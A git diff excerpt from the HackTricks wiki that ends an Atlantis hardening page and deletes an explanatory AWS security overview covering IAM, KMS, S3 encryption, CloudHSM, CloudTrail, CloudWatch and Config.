pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings. - -### Don't Use `--allow-fork-prs` - -If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo. - -### `--repo-allowlist` - -Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example: - -* Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests` -* Your whole organization: `--repo-allowlist=github.com/runatlantis/*` -* Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*` -* All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret. - -This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details. - -### Protect Terraform Planning - -If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source) or by specifying a malicious provider. This code could then exfiltrate your credentials. - -To prevent this, you could: - -1. Bake providers into the Atlantis image or host and deny egress in production. -2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry. -3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here. - -### Webhook Secrets - -Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab). - -If you are using Azure DevOps, instead of webhook secrets add a basic username and password. - -[**#**](https://www.runatlantis.io/docs/security.html#azure-devops-basic-authentication)**Azure DevOps Basic Authentication** - -Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location. - -### SSL/HTTPS - -If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags. - -### Enable Authentication on Atlantis Web Server - -It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags. - -You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`. - -## References - -* [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs)\*\*\*\* - -
- -Support HackTricks and get benefits! - -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/aws-security.md b/cloud-security/aws-security.md deleted file mode 100644 index 71a11f3b1..000000000 --- a/cloud-security/aws-security.md +++ /dev/null @@ -1,1019 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Types of services - -## Container services - -Services that fall under container services have the following characteristics: - -* The service itself runs on **separate infrastructure instances**, such as EC2. -* **AWS** is responsible for **managing the operating system and the platform**. -* A managed service is provided by AWS, which is typically the service itself for the **actual application which are seen as containers**. -* As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**. -* Also, platform-level identity and access management where it exists. -* **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk. - -## Abstract Services - -* These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**. -* The services are accessed via endpoints using AWS application programming interfaces, APIs. -* The **underlying infrastructure, operating system, and platform is managed by AWS**. -* The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared. -* **Data is isolated via security mechanisms**. -* Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS. - -# IAM - Identity and Access Management - -IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account. - -* **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification. -* **Authorization** - Determines what an identity can access within a system once it's been authenticated to it. -* **Access Control** - The method and process of how access is granted to a secure resource - -IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account. - -## Users - -This could be a **real person** within your organization who requires access to operate and maintain your AWS environment. Or it could be an account to be used by an **application** that may require permissions to **access** your **AWS** resources **programmatically**. Note that **usernames must be unique**. - -### CLI - -* **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT -* **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs). - -Whenever you need to **change the Access Key** this is the process you should follow:\ -_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_ - -**MFA** is **supported** when using the AWS **CLI**. - -## Groups - -These are objects that **contain multiple users**. Permissions can be assigned to a user or inherit form a group. **Giving permission to groups and not to users the secure way to grant permissions**. - -## Roles - -Roles are used to grant identities a set of permissions. **Roles don't have any access keys or credentials associated with them**. Roles are usually used with resources (like EC2 machines) but they can also be useful to grant **temporary privileges to a user**. Note that when for example an EC2 has an IAM role assigned, instead of saving some keys inside the machine, dynamic temporary access keys will be supplied by the IAM role to handle authentication and determine if access is authorized. - -An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining who can assume the role, and a **permissions policy**, which cannot be empty, defining what they can access. - -### AWS Security Token Service (STS) - -This is a web service that enables you to **request temporary, limited-privilege credentials** for AWS Identity and Access Management (IAM) users or for users that you authenticate (federated users). - -## Policies - -### Policy Permissions - -Are used to assign permissions. There are 2 types: - -* AWS managed policies (preconfigured by AWS) -* Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own.. - -By **default access** is **denied**, access will be granted if an explicit role has been specified. \ -If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default). - -```javascript -{ - "Version": "2012-10-17", //Version of the policy - "Statement": [ //Main element, there can be more than 1 entry in this array - { - "Sid": "Stmt32894y234276923" //Unique identifier (optional) - "Effect": "Allow", //Allow or deny - "Action": [ //Actions that will be allowed or denied - "ec2:AttachVolume", - "ec2:DetachVolume" - ], - "Resource": [ //Resource the action and effect will be applied to - "arn:aws:ec2:*:*:volume/*", - "arn:aws:ec2:*:*:instance/*" - ], - "Condition": { //Optional element that allow to control when the permission will be effective - "ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"} - } - } - ] -} -``` - -### Inline Policies - -This kind of policies are **directly assigned** to a user, group or role. Then, they not appear in the Policies list as any other one can use them.\ -Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity. - -### S3 Bucket Policies - -Can only be applied to S3 Buckets. They contains an attribute called 'principal' that can be: IAM users, Federated users, another AWS account, an AWS service. P**rincipals define who/what should be allowed or denied access to various S3 resources.** - -## Multi-Factor Authentication - -It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication.\ -You can use a **free virtual application or a physical device**. You can use apps like google authentication for free to activate a MFA in AWS. - -## Identity Federation - -Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account. \ -An example of an identity provider can be your own corporate Microsoft Active Directory(via SAML) or OpenID services (like Google). Federated access will then allow the users within it to access AWS.\ -AWS Identity Federation connects via IAM roles. - -### Cross Account Trusts and Roles - -**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only h**aving the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\ -It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust. - -### AWS Simple AD - -Not supported: - -* Trust Relations -* AD Admin Center -* Full PS API support -* AD Recycle Bin -* Group Managed Service Accounts -* Schema Extensions -* No Direct access to OS or Instances - -### Web Federation or OpenID Authentication - -The app uses the AssumeRoleWithWebIdentity to create temporary credentials. However this doesn't grant access to the AWS console, just access to resources within AWS. - -## Other IAM options - -* You can **set a password policy setting** options like minimum length and password requirements. -* You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**. - -# KMS - Key Management Service - -AWS Key Management Service (AWS KMS) is a managed service that makes it easy for you to **create and control **_**customer master keys**_** (CMKs)**, the encryption keys used to encrypt your data. AWS KMS CMKs are **protected by hardware security modules** (HSMs) - -KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**.\ -KMS is a **region specific service**. - -**Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application it's up to us to administer our encryption keys and administer how those keys are used. - -**Customer Master Keys** (CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data. - -A customer master key (CMK) is a logical representation of a master key in AWS KMS. In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK. - -There are 2 types of master keys: - -* **AWS managed CMKs: Used by other services to encrypt data**. It's used by the service that created it in a region. They are created the first time you implement the encryption in that service. Rotates every 3 years and it's not possible to change it. -* **Customer manager CMKs**: Flexibility, rotation, configurable access and key policy. Enable and disable keys. - -**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**. - -## Key Policies - -These defines **who can use and access a key in KMS**. By default root user has full access over KMS, if you delete this one, you need to contact AWS for support. - -Properties of a policy: - -* JSON based document -* Resource --> Affected resources (can be "\*") -* Action --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (permissions) -* Effect --> Allow/Deny -* Principal --> arn affected -* Conditions (optional) --> Condition to give the permissions - -Grants: - -* Allow to delegate your permissions to another AWS principal within your AWS account. You need to create them using the AWS KMS APIs. It can be indicated the CMK identifier, the grantee principal and the required level of opoeration (Decrypt, Encrypt, GenerateDataKey...) -* After the grant is created a GrantToken and a GratID are issued - -Access: - -* Via key policy -- If this exist, this takes precedent over the IAM policy, s the IAM olicy is not used -* Via IAM policy -* Via grants - -## Key Administrators - -Key administrator by default: - -* Have access to manage KMS but not to encrypt or decrypt data -* Only IAM users and roles can be added to Key Administrators list (not groups) -* If external CMK is used, Key Administrators have the permission to import key material - -## Rotation of CMKs - -* The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases. -* **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed. -* **Older keys are retained** to decrypt data that was encrypted prior to the rotation -* In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**. -* If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled. - -### Manual rotation - -* A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID. -* To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to. -* You need to **keep old keys to decrypt old files** encrypted with it. - -You can import keys from your on-premises key infrastructure . - -## Other information - -KMS is priced per number of encryption/decryption requests received from all services per month. - -KMS has full audit and compliance **integration with CloudTrail**; this is where you can audit all changes performed on KMS. - -With KMS policy you can do the following: - -* Limit who can create data keys and which services have access to use these keys -* Limit systems access to encrypt only, decrypt only or both -* Define to enable systems to access keys across regions (although it is not recommended as a failure in the region hosting KMS will affect availability of systems in other regions). - -You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region. - -# S3 - -Amazon S3 is a service that allows you **store important amounts of data**. - -Amazon S3 provides multiple options to achieve the **protection** of data at REST. The options include **Permission** (Policy), **Encryption** (Client and Server Side), **Bucket Versioning** and **MFA** **based delete**. The **user can enable** any of these options to achieve data protection. **Data replication** is an internal facility by AWS where **S3 automatically replicates each object across all the Availability Zones** and the organization need not enable it in this case. - -With resource-based permissions, you can define permissions for sub-directories of your bucket separately. - -## S3 Access logs - -It's possible to **enable S3 access login** (which by default is disabled) to some bucket and save the logs in a different bucket to know who is accessing the bucket. The source bucket and the target bucket (the one is saving the logs needs to be in the same region. - -## S3 Encryption Mechanisms - -**DEK means Data Encryption Key** and is the key that is always generated and used to encrypt data. - -**Server-side encryption with S3 managed keys, SSE-S3:** This option requires minimal configuration and all management of encryption keys used are managed by AWS. All you need to do is to **upload your data and S3 will handle all other aspects**. Each bucket in a S3 account is assigned a bucket key. - -* Encryption: - * Object Data + created plaintext DEK --> Encrypted data (stored inside S3) - * Created plaintext DEK + S3 Master Key --> Encrypted DEK (stored inside S3) and plain text is deleted from memory -* Decryption: - * Encrypted DEK + S3 Master Key --> Plaintext DEK - * Plaintext DEK + Encrypted data --> Object Data - -Please, note that in this case **the key is managed by AWS** (rotation only every 3 years). If you use your own key you willbe able to rotate, disable and apply access control. - -**Server-side encryption with KMS managed keys, SSE-KMS:** This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you a far greater flexibility of how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and order to against their usage using AWS Cloud Trail. - -* Encryption: - * S3 request data keys from KMS CMK - * KMS uses a CMK to generate the pair DEK plaintext and DEK encrypted and send them to SΒ£ - * S3 uses the paintext key to encrypt the data, store the encrypted data and the encrypted key and deletes from memory the plain text key -* Decryption: - * S3 ask to KMS to decrypt the encrypted data key of the object - * KMS decrypt the data key with the CMK and send it back to S3 - * S3 decrypts the object data - -**Server-side encryption with customer provided keys, SSE-C:** This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you. - -* Encryption: - * The user sends the object data + Customer key to S3 - * The customer key is used to encrypt the data and the encrypted data is stored - * a salted HMAC value of the customer key is stored also for future key validation - * the customer key is deleted from memory -* Decryption: - * The user send the customer key - * The key is validated against the HMAC value stored - * The customer provided key is then used to decrypt the data - -**Client-side encryption with KMS, CSE-KMS:** Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored. - -* Encryption: - * Client request for a data key to KMS - * KMS returns the plaintext DEK and the encrypted DEK with the CMK - * Both keys are sent back - * The client then encrypts the data with the plaintext DEK and send to S3 the encrypted data + the encrypted DEK (which is saved as metadata of the encrypted data inside S3) -* Decryption: - * The encrypted data with the encrypted DEK is sent to the client - * The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK - * The client can now decrypt the encrypted data - -**Client-side encryption with customer provided keys, CSE-C:** Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage. - -* Encryption: - * The client generates a DEK and encrypts the plaintext data - * Then, using it's own custom CMK it encrypts the DEK - * submit the encrypted data + encrypted DEK to S3 where it's stored -* Decryption: - * S3 sends the encrypted data and DEK - * As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data - -# HSM - Hardware Security Module - -Cloud HSM is a FIPS 140 level two validated **hardware device** for secure cryptographic key storage (note that CloudHSM is a hardware appliance, it is not a virtualized service). It is a SafeNetLuna 7000 appliance with 5.3.13 preloaded. There are two firmware versions and which one you pick is really based on your exact needs. One is for FIPS 140-2 compliance and there was a newer version that can be used. - -The unusual feature of CloudHSM is that it is a physical device, and thus it is **not shared with other customers**, or as it is commonly termed, multi-tenant. It is dedicated single tenant appliance exclusively made available to your workloads - -Typically, a device is available within 15 minutes assuming there is capacity, but if the AZ is out of capacity it can take two weeks or more to acquire additional capacity. - -Both KMS and CloudHSM are available to you at AWS and both are integrated with your apps at AWS. Since this is a physical device dedicated to you, **the keys are stored on the device**. Keys need to either be **replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS. - -In **CloudHSM**, you have to **scale the service yourself**. You have to provision enough CloudHSM devices to handle whatever your encryption needs are based on the encryption algorithms you have chosen to implement for your solution.\ -Key Management Service scaling is performed by AWS and automatically scales on demand, so as your use grows, so might the number of CloudHSM appliances that are required. Keep this in mind as you scale your solution and if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution. - -Just like scaling, **performance is up to you with CloudHSM**. Performance varies based on which encryption algorithm is used and on how often you need to access or retrieve the keys to encrypt the data. Key management service performance is handled by Amazon and automatically scales as demand requires it. CloudHSM's performance is achieved by adding more appliances and if you need more performance you either add devices or alter the encryption method to the algorithm that is faster. - -If your solution is **multi-region**, you should add several **CloudHSM appliances in the second region and work out the cross-region connectivity with a private VPN connection** or some method to ensure the traffic is always protected between the appliance at every layer of the connection. If you have a multi-region solution you need to think about how to **replicate keys and set up additional CloudHSM devices in the regions where you operate**. You can very quickly get into a scenario where you have six or eight devices spread across multiple regions, enabling full redundancy of your encryption keys. - -**CloudHSM** is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only (cannot act as a certificate authority)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution. - -**CloudHSM is considerably more expensive than Key Management Service**. CloudHSM is a hardware appliance so you have fix costs to provision the CloudHSM device, then an hourly cost to run the appliance. The cost is multiplied by as many CloudHSM appliances that are required to achieve your specific requirements.\ -Additionally, cross consideration must be made in the purchase of third party software such as SafeNet ProtectV software suites and integration time and effort. Key Management Service is a usage based and depends on the number of keys you have and the input and output operations. As key management provides seamless integration with many AWS services, integration costs should be significantly lower. Costs should be considered secondary factor in encryption solutions. Encryption is typically used for security and compliance. - -**With CloudHSM only you have access to the keys** and without going into too much detail, with CloudHSM you manage your own keys. **With KMS, you and Amazon co-manage your keys**. AWS does have many policy safeguards against abuse and **still cannot access your keys in either solution**. The main distinction is compliance as it pertains to key ownership and management, and with CloudHSM, this is a hardware appliance that you manage and maintain with exclusive access to you and only you. - -## CloudHSM Suggestions - -1. Always deploy CloudHSM in an **HA setup** with at least two appliances in **separate availability zones**, and if possible, deploy a third either on premise or in another region at AWS. -2. Be careful when **initializing** a **CloudHSM**. This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data. -3. CloudHSM only **supports certain versions of firmware** and software. Before performing any update, make sure the firmware and or software is supported by AWS. You can always contact AWS support to verify if the upgrade guide is unclear. -4. The **network configuration should never be changed.** Remember, it's in a AWS data center and AWS is monitoring base hardware for you. This means that if the hardware fails, they will replace it for you, but only if they know it failed. -5. The **SysLog forward should not be removed or changed**. You can always **add** a SysLog forwarder to direct the logs to your own collection tool. -6. The **SNMP** configuration has the same basic restrictions as the network and SysLog folder. This **should not be changed or removed**. An **additional** SNMP configuration is fine, just make sure you do not change the one that is already on the appliance. -7. Another interesting best practice from AWS is **not to change the NTP configuration**. It is not clear what would happen if you did, so keep in mind that if you don't use the same NTP configuration for the rest of your solution then you could have two time sources. Just be aware of this and know that the CloudHSM has to stay with the existing NTP source. - -The initial launch charge for CloudHSM is $5,000 to allocate the hardware appliance dedicated for your use, then there is an hourly charge associated with running CloudHSM that is currently at $1.88 per hour of operation, or approximately $1,373 per month. - -The most common reason to use CloudHSM is compliance standards that you must meet for regulatory reasons. **KMS does not offer data support for asymmetric keys. CloudHSM does let you store asymmetric keys securely**. - -The **public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH. - -# Amazon Athena - -Amazon Athena is an interactive query service that makes it easy to **analyze data** directly in Amazon Simple Storage Service (Amazon **S3**) **using** standard **SQL**. - -You need to **prepare a relational DB table** with the format of the content that is going to appear in the monitored S3 buckets. And then, Amazon Athena will be able to populate the DB from th logs, so you can query it. - -Amazon Athena supports the **hability to query S3 data that is already encrypted** and if configured to do so, **Athena can also encrypt the results of the query which can then be stored in S3**. - -**This encryption of results is independent of the underlying queried S3 data**, meaning that even if the S3 data is not encrypted, the queried results can be encrypted. A couple of points to be aware of is that Amazon Athena only supports data that has been **encrypted** with the **following S3 encryption methods**, **SSE-S3, SSE-KMS, and CSE-KMS**. - -SSE-C and CSE-E are not supported. In addition to this, it's important to understand that Amazon Athena will only run queries against **encrypted objects that are in the same region as the query itself**. If you need to query S3 data that's been encrypted using KMS, then specific permissions are required by the Athena user to enable them to perform the query. - -# AWS CloudTrail - -This service **tracks and monitors AWS API calls made within the environment**. Each call to an API (event) is logged. Each logged event contains: - -* The name of the called API: `eventName` -* The called service: `eventSource` -* The time: `eventTime` -* The IP address: `SourceIPAddress` -* The agent method: `userAgent`. Examples: - * Signing.amazonaws.com - From AWS Management Console - * console.amazonaws.com - Root user of the account - * lambda.amazonaws.com - AWS Lambda -* The request parameters: `requestParameters` -* The response elements: `responseElements` - -Event's are written to a new log file **approximately each 5 minutes in a JSON file**, they are held by CloudTrail and finally, log files are **delivered to S3 approximately 15mins after**.\ -CloudTrail allows to use **log file integrity in order to be able to verify that your log files have remained unchanged** since CloudTrail delivered them to you. It creates a SHA-256 hash of the logs inside a digest file. A sha-256 hash of the new logs is created every hour.\ -When creating a Trail the event selectors will allow you to indicate the trail to log: Management, data or insights events. - -Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3) so AWS will decrypt the content for the people that has access to it, but for additional security you can use SSE with KMS and your own keys. - -## Log File Naing Convention - -![](<../.gitbook/assets/image (429).png>) - -## S3 folder structure - -![](<../.gitbook/assets/image (428).png>) - -Note that the folders "_AWSLogs_" and "_CloudTrail_" are fixed folder names, - -**Digest** files have a similar folders path: - -![](<../.gitbook/assets/image (437).png>) - -## Aggregate Logs from Multiple Accounts - -* Create a Trial in the AWS account where you want the log files to be delivered to -* Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access -* Create a new Trail in the other AWS accounts and select to use the created bucket in step 1 - -However, even if you can save al the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs belonging to a single AWS account - -## Log Files Checking - -You can check that the logs haven't been altered by running - -```javascript -aws cloudtrail validate-logs --trail-arn --start-time [--end-time ] [--s3-bucket ] [--s3-prefix ] [--verbose] -``` - -## Logs to CloudWatch - -**CloudTrail can automatically send logs to CloudWatch so you can set alerts that warns you when suspicious activities are performed.**\ -Note that in order to allow CloudTrail to send the logs to CloudWatch a **role** needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to: - -* CreateLogStream: This allows to create a CloudWatch Logs log streams -* PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream - -## Event History - -CloudTrail Event History allows you to inspect in a table the logs that have been recorded: - -![](<../.gitbook/assets/image (431).png>) - -## Insights - -**CloudTrail Insights** automatically **analyzes** write management events from CloudTrail trails and **alerts** you to **unusual activity**. For example, if there is an increase in `TerminateInstance` events that differs from established baselines, you’ll see it as an Insight event. These events make **finding and responding to unusual API activity easier** than ever. - -# CloudWatch - -Amazon CloudWatch allows to **collect all of your logs in a single repository** where you can create **metrics** and **alarms** based on the logs.\ -CloudWatch Log Event have a **size limitation of 256KB of each log line**. - -You can monitor for example logs from CloudTrail.\ -Events that are monitored: - -* Changes to Security Groups and NACLs -* Starting, Stopping, rebooting and terminating EC2instances -* Changes to Security Policies within IAM and S3 -* Failed login attempts to the AWS Management Console -* API calls that resulted in failed authorization -* Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html) - -## Agent Installation - -You can install agents insie your machines/containers to automatically send the logs back to CloudWatch. - -* **Create** a **role** and **attach** it to the **instance** with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM) -* **Download** and **install** the **agent** onto the EC2 instance ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). You can download it from inside the EC2 or install it automatically using AWS System Manager selecting the package AWS-ConfigureAWSPackage -* **Configure** and **start** the CloudWatch Agent - -A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order. - -# Cost Explorer and Anomaly detection - -This allows you to check how are you expending money in AWS services and help you **detecting anomalies**.\ -Moreover, you can configure an anomaly detection so AWS will warn you when some anomaly in costs is found. - -## Budgets - -Budgets help to manage costs and usage. You can get **alerted when a threshold is reached**.\ -Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?). - -# AWS Config - -AWS Config **capture resource changes**, so any change to a resource supported by Config can be recorded, which will **record what changed along with other useful metadata, all held within a file known as a configuration item**, a CI.\ -This service is **region specific**. - -A configuration item or **CI** as it's known, is a key component of AWS Config. It is comprised of a JSON file that **holds the configuration information, relationship information and other metadata as a point-in-time snapshot view of a supported resource**. All the information that AWS Config can record for a resource is captured within the CI. A CI is created **every time** a supported resource has a change made to its configuration in any way. In addition to recording the details of the affected resource, AWS Config will also record CIs for any directly related resources to ensure the change did not affect those resources too. - -* **Metadata**: Contains details about the configuration item itself. A version ID and a configuration ID, which uniquely identifies the CI. Ither information can include a MD5Hash that allows you to compare other CIs already recorded against the same resource. -* **Attributes**: This holds common **attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance -* **Relationships**: This holds information for any connected **relationship that the resource may have**. So within this section, it would show a clear description of any relationship to other resources that this resource had. For example, if the CI was for an EC2 instance, the relationship section may show the connection to a VPC along with the subnet that the EC2 instance resides in. -* **Current configuration:** This will display the same information that would be generated if you were to perform a describe or list API call made by the AWS CLI. AWS Config uses the same API calls to get the same information. -* **Related events**: This relates to AWS CloudTrail. This will display the **AWS CloudTrail event ID that is related to the change that triggered the creation of this CI**. There is a new CI made for every change made against a resource. As a result, different CloudTrail event IDs will be created. - -**Configuration History**: It's possible to obtain the configuration history of resources thanks to the configurations items. A configuration history is delivered every 6 hours and contains all CI's for a particular resource type. - -**Configuration Streams**: Configuration items are sent to an SNS Topic to enable analysis of the data. - -**Configuration Snapshots**: Configuration items are used to create a point in time snapshot of all supported resources. - -**S3 is used to store** the Configuration History files and any Configuration snapshots of your data within a single bucket, which is defined within the Configuration recorder. If you have multiple AWS accounts you may want to aggregate your configuration history files into the same S3 bucket for your primary account. However, you'll need to grant write access for this service principle, config.amazonaws.com, and your secondary accounts with write access to the S3 bucket in your primary account. - -## Config Rules - -Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allows you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\ -AWS have a number of **predefined rules** 